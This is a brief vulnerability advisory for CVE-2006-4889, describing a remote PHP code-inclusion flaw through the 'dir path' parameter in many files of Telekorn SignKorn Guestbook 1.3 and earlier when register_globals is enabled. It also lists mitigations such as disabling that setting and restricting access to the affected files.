CVE-2006-4889

Name of the Vulnerable Software and Affected Versions Telekorn SignKorn Guestbook (SL) versions 1.3 and earlier

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the dir path parameter in multiple PHP files, including "index.php", "includes/functions.gb.php", "includes/functions.admin.php", "includes/admin.inc.php", "help.php", "smile.php", "entry.php", "adminhelp0.php", "adminhelp1.php", "adminhelp2.php", "adminhelp3.php" in "help/en" and "help/de" directories, and "preview.php", "log.php", "index.php", "config.php", and "admin.php" in the "admin" directory, when register globals is enabled.

Recommendations For Telekorn SignKorn Guestbook (SL) versions 1.3 and earlier, consider disabling the register globals setting to prevent exploitation. As a temporary workaround, restrict access to the vulnerable PHP files until a patch is available. Avoid using the dir path parameter in the affected PHP files until the issue is resolved.